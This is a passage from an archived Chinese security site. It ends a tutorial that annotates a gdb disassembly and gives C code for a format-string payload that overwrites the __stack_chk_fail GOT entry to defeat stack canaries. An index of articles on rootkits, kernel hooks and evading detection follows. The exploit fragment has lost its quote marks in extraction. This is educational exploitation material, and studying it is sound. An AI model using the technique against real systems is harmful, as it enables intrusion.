(%eax),%eax.. 0x080484f3 main+79 : mov %eax,0x4(%esp)- 把argv[1]放入esp+4处.. 0x080484f7 main+83 : lea 0xffffff30(%ebp),%eax- buff的位置在ebp-208处.. ---Type return to continue, or q return to quit---.. 0x080484fd main+89 : mov %eax,(%esp)- 把buff指针放入esp处.. 0x08048500 main+92 : call 0x80483c8 strcpy@plt - 执行strcpy.. 0x08048505 main+97 : movl $0x2,0x4(%esp).. 0x0804850d main+105 : movl $0x8048639,(%esp).. 0x08048514 main+112 : call 0x8048378 open@plt.. 0x08048519 main+117 : mov %eax,0xffffff2c(%ebp).. 0x0804851f main+123 : movl $0x1,0x4(%esp).. 0x08048527 main+131 : mov 0xffffff2c(%ebp),%eax.. 0x0804852d main+137 : mov %eax,(%esp).. 0x08048530 main+140 : call 0x80483b8 dup2@plt.. 0x08048535 main+145 : lea 0xffffff30(%ebp),%eax.. 0x0804853b main+151 : mov %eax,(%esp)- 把buff指针放入esp处.. 0x0804853e main+154 : call 0x80483d8 printf@plt - 执行printf.. 0x08048543 main+159 : mov 0xfffffff8(%ebp),%edx.. 0x08048546 main+162 : xor %gs:0x14,%edx- 比较canary word是否改变.. 0x0804854d main+169 : je 0x8048554 main+176 - 相等则正常返回.. 0x0804854f main+171 : call 0x80483e8 __stack_chk_fail@plt - 不等则转向失败处理.. 0x08048554 main+176 : add $0xe4,%esp.. 0x0804855a main+182 : pop %ecx- 恢复ecx的值.. 0x0804855b main+183 : pop %ebp.. 0x0804855c main+184 : lea 0xfffffffc(%ecx),%esp- esp等于ecx-4.. 0x0804855f main+187 : ret.. End of assembler dump.. (gdb) x/i 0x80483e8.. 0x80483e8 __stack_chk_fail@plt : jmp *0x8049758- 要写入的内存地址为0x8049758.. (gdb).. addr=0xbfffffd1;.. *((int *)buff)=0x8049758;.. strcpy(buff+4, %700000000u%700000000u%700000000u%700000000u% );.. addr=addr-2800000004;.. j=strlen(buff);.. sprintf(buff+j, %uu ,addr);.. strcat(buff, %n );.. for(i=strlen(buff);i sizeof(buff);i++).. buff[i]= A ;.. buff[239]= \0 ;.. 另外,经过测试,当char数组小于8时,gcc不会在编译过程中加入保护代码,这时可以按照传统的方法溢出。而在ubuntu、debian系统中,canary word是一个固定的数0xff0a0000,因此有可能通过多次覆盖或者基于memcpy的栈溢出绕过该保护。..

    Original link path: /articles/200908/993.html
    Open archive

  • Title: 安全焦点::安全文摘
    Descriptive info: 专题文章.. 语言.. 属性.. BIOS中隐藏Telnet后门.. 编程技术.. 中文.. 原创.. 2009-03-19.. cheng5103.. BPE32 多态引擎剖析.. 2008-11-11.. nEINEI.. IE7自动完成口令获取.. 2008-10-24.. grassgrass.. 挂钩 NtResumeThread 实现全局Hook.. 2008-05-25.. BITS.. 对抗启发式代码仿真检测技术分析.. 2008-05-06.. 程序从DOS/bios驻留内存到WINNT下监视读入内存数据.. 2008-04-01.. ObjectType HOOK干涉注册表操作(bypass Icesword,gmer,NIAP,etc.. ).. 2008-02-11.. MJ0011.. 简析利用调试寄存器实现内核函数的HOOK.. 2007-09-23.. yykingking.. 反向进程注入及隐藏--动手做一个最简单的PELoader.. 2007-07-28.. Luke0314.. 突破 Windows NT 内核进程监视设置限制.. 2007-07-18.. whitecell.. 突破icesword实现文件隐藏.. 2007-07-06.. rhett.. BIOS Rootkit:Welcome home,my Lord!.. 2007-05-11.. icelord.. 基于Filter-Hook Driver(使用ipfirewall.. h)的IP过滤驱动.. 2007-02-27.. fleshwound..  ...   swords.. Do All In One EXE File Under Win32.. 2006-10-07.. 杂谈PHP4内核Hacking.. 2006-05-26.. Darkness.. 利用伪造内核文件来绕过IceSword的检测.. 2005-12-20.. backspray.. kernel inline hook 绕过vice检测.. 2005-11-05.. jqzmb.. 使用omniORBpy开发简单CORBA程序.. r00t.. 绕过Copy-On-Write机制安装全局Hook.. 2005-10-22.. Addylee.. 2005-10-02.. IIS5 ISAPI Extension Back Door.. ph4_yunshu.. Raising The Bar For Windows Rootkit Detection.. 翻译.. linux2linux.. 使用Perl编写协议分析脚本.. 2005-08-07.. 基于ARP欺骗的TCP伪连接D.. o.. S.. 2005-06-07.. ffantasyYD.. 检测并禁用隐藏服务.. 2005-05-30.. 内核级利用通用Hook函数方法检测进程.. 2005-05-10.. LionD8.. 非API函数检测操作系统类型.. 2005-04-14.. sFqRy..

    Original link path: /articles/5.html
    Open archive



  •  


    Archived pages: 1038